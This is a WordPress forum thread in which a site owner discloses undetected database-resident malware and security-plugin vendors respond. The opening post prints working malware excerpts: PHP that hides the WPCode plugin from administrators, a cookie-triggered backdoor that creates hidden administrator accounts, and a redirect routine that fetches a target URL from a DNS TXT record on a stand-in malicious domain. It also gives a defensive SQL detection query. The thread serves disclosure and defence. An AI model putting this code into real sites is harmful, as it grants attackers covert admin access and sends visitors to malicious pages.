New Malware Found in WordPress Installations: Hidden Admin Users, Redirects, and

  • Hey everyone,

    I’ve come across a new type of malware that has infected several of our WordPress installations, and what’s concerning is that none of the security scanners we used, including Wordfence, GOTMLS.NET, and about 12 others, were able to detect it. We tried all major tools, but none flagged this threat. It’s well hidden in the database, specifically in entries such as wpcode_snippets, siteurl, home, and redirection_options, and it uses advanced techniques to hide from both admins and security plugins.
    The site was compromised because it had a weak password, not due to any security vulnerabilities in plugins.

    Here are some of the scanners we used that failed to detect the malware:

    • Wordfence
    • GOTMLS.NET
    • Sucuri SiteCheck
    • MalCare
    • iThemes Security
    • All In One WP Security & Firewall
    • WPScan
    • Anti-Malware Security (by Eli/GOTMLS.NET)
    • SecuPress
    • Quttera Web Malware Scanner
    • Exploit Scanner
    • WPCore Scan
    • WP Cerber Security
    • ClamAV

    Despite using this wide range of scanners, none were able to identify the malicious code injected into the database. I’m sharing this here to alert the community and to see if anyone has encountered a similar issue or has insights on how to combat it.Admin Panel Hijacking:

    • The malware modifies the admin interface by hiding specific security-related plugins (like “Code Snippets”) and preventing the admin from reviewing compromised plugins and critical notifications.
    • Here’s a?code snippet?used to hide plugins:

    if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {

    add_action('admin_print_scripts', function () {

    echo '<style>';

    echo '#toplevel_page_wpcode { display: none; }';

    echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';

    echo '#wpcode-notice-global-review_request { display: none; }';

    echo '</style>';

    });

    add_filter('all_plugins', function ($plugins) {

    unset($plugins['insert-headers-and-footers/ihaf.php']);

    return $plugins;

    });

    }

    Creation of Hidden Admin Users:

    • The malware reads cookie data to insert admin credentials into the database and creates hidden admin users, unknown to the actual site owner.
    • Here's an example of the code that creates hidden admin users:

    if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {

    switch (_gcookie('c')) {

    case 'au':

    $u = _gcookie('u');

    $p = _gcookie('p');

    $e = _gcookie('e');

    if ($u && $p && $e && !username_exists($u)) {

    $user_id = wp_create_user($u, $p, $e);

    $user = new WP_User($user_id);

    $user->set_role('administrator');

    }

    break;

    }

    }

    Redirection of Non-Logged-In Users:

    • Non-logged-in users or visitors with certain IP addresses are redirected to malicious external URLs using DNS records.
    • Here’s the?redirect code

    function _red() {

    if (is_user_logged_in()) {

    return;

    }

    $ip = _user_ip();

    if (!$ip) {

    return;

    }

    $req = 'malicious-domain.com'; // Example of malicious domain being resolved

    $s = dns_get_record($req, DNS_TXT);

    if (is_array($s) && !empty($s)) {

    $redirect_url = base64_decode($s[0]['txt']);

    if (substr($redirect_url, 0, 4) === 'http') {

    wp_redirect($redirect_url);

    exit;

    }

    }

    }

    IP and Session Tracking:

    • The malware tracks IP addresses to avoid redirecting the same IP multiple times in a 24-hour period.

    How We Found It:

    The malware was hidden in the wp_options table, affecting entries like wpcode_snippetssiteurlhome, and redirection_options. It wasn’t detected by popular security plugins, including Wordfence.

    We ran the following SQL query across all installations to identify suspicious patterns:

    SELECT option_name, option_value

    FROM wp_options

    WHERE option_name IN ('siteurl', 'home', 'wpcode_snippets', 'wpseo', 'redirection_options')

    AND (option_value LIKE '%<script%'

    OR option_value LIKE '%eval%'

    OR option_value LIKE '%base64_decode%'

    OR option_value LIKE '%document.write%');Observed Effects:

    • Non-logged-in users or visitors from unknown IPs are redirected to malicious sites.
    • Hidden admin users are created without the site owner’s knowledge.
    • Security plugins and important notifications are hidden from the admin panel.

    What You Should Know:

    • This malware injects itself into database options like?wpcode_snippets?and?siteurl, making it hard to detect via traditional scans.
    • The existing WordPress security plugins (including Wordfence)?did not detect?this malware.

    What Can Be Done:

    If you manage WordPress sites, I highly recommend checking your wp_options table for any suspicious values using the SQL query above. If anyone from the WordPress security community or plugin developers has encountered similar issues, I would love to collaborate on identifying how this malware propagates and how we can stop it.

    Feel free to reach out if you need more details or want to review the code in depth. I’ve attached the full script of the malicious code I found on injected as value the DB under a wpcode_snippets inside the wp_option table.

    Be aware, the code contained in the file below is a malware, please do not install or copy this code in your eviroment for any reason.

    https://file.io/RxJXp8clljh5

    Stay safe, and thanks for your attention!

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter nonsonokoreano

    (@nonsonokoreano)

    new malware sample url

    https://docs.google.com/document/d/1O0qxSaGkTglmekH-v-ZqpkikGfGSQpvBabeuAI1a4ZQ/edit?usp=sharing

    Plugin Author Eli

    (@scheeeli)

    Thanks for reporting this new threat. I have seen similar threats use this same technique of installing the WPCode Lite plugin and then creating code snippets in the DB to hide it from view in the wp-admin. I all the infection of this type that I have seen the sites were all compromised in different ways. Some were brute force while others were exploited using various un-patched plugin vulnerabilities.

    I would like to see the details of all the code you found but that link to the file you shared on file[.]io was already deleted. Can you please send me any files you have directly to my email?

    eli AT gotmls DOT net

    Plugin Author Eli

    (@scheeeli)

    My first reply was automatically held for moderation because I used the “V” word (you’ll see when a moderator has time to review it and allow it to be posted). Until then…

    I see that you have posted an update with a link to the infected content in your DB. I am familiar with that particular script and that variant has been in my definition updates since the 7th of last month, so I am not sure why it was not detected by my plugin on your site. Are you sure that specific code was in the DB of a site that you scanned with my Anti-Malware plugin, and you had the latest definition updates installed?

    Thread Starter nonsonokoreano

    (@nonsonokoreano)

    Yes, we definitely had the latest definition updates installed at 13:30 GMT on 09/11/2024 when we attempted to remove the malware, but unfortunately, nothing was detected, even with the most thorough and slow scan options enabled. The code I’ve shared is exactly what was found in the database, without any modifications.

    I’m not sure why it wasn’t picked up, but I wanted to bring it to your attention in case it helps improve future detection. Let me know if you need any more details or would like further logs from our side.

    Hello there, Julio, SecuPress owner.

    We’re aware of this malware and finally found a way to really prevent user insertion, from wp_insert_user() or using a custom $wpdb query or even directly pushed in the DB outside of a WordPress env (yep we did that!).

    Also we are aware of plugin hiding themselves or snippet hiding plugins, and finally found a way to always display every plugins on the plugin’s page.

    Then we finally added a more accurate MalwareDB Scanner to find that kind of code in the DB now. And I’ll add you one more stuff to check, the CPT slug “'custom-css-js'” can contains JS scripts to redirect like you have shown.

    Those 3 features already exists in SecuPress, but with a less effective way, the next version (release beta this month!) can help you with those 3 points. I would be happy if you could test it first and give me some feedback. Contact me “contact AT secupress.me”, the version is not ready yet, but will be soon, indeed.

    We are actually working on 2 features, one that prevent the full load of the website if a file is included when it should not be, and another one when a http request parameter value is the same as a function, tricky because of false positives, but we’re trying, we really focus on WordPress malwares and spend time on R&D to find the best ways to prevent a website to be hacked. (you read that first here ^^)

    Now, thank you very much for testing our plugins (not only mine, everyone here) and thank you for this report, it helps us and everyone mentioned to improve our products.

    See you soon

    This is exactly whats happening with 14 of my WP based websites for last few months. I clean up the website with Wordfence, and Anti-Malware, but within a week, it gets back, wp_update_43243 user with some random numbers at end is created, and 30 to 50 files with random names.

    It gets detected sometimes by Wordfence, sometimes I run complete scan by Anti-Malware and it gets detected, but it get back again.

    Here are couple of files, this one is like 30 to 50 files with random names: https://pastebin.com/3hqnr9Rq, and this 2nd one is usually only one master file per website with name something like .2345454.css in deep folder: https://pastebin.com/y6YBqmBT

    It would be great is there’s a way to actually get rid of the this malware completely.

    I have no nulled WP themes or plugins, most are free versions from WP.org, and few themes which are bought from themeforest and kept updated. All themes and plugins are always updated.

Viewing 6 replies - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.

Tags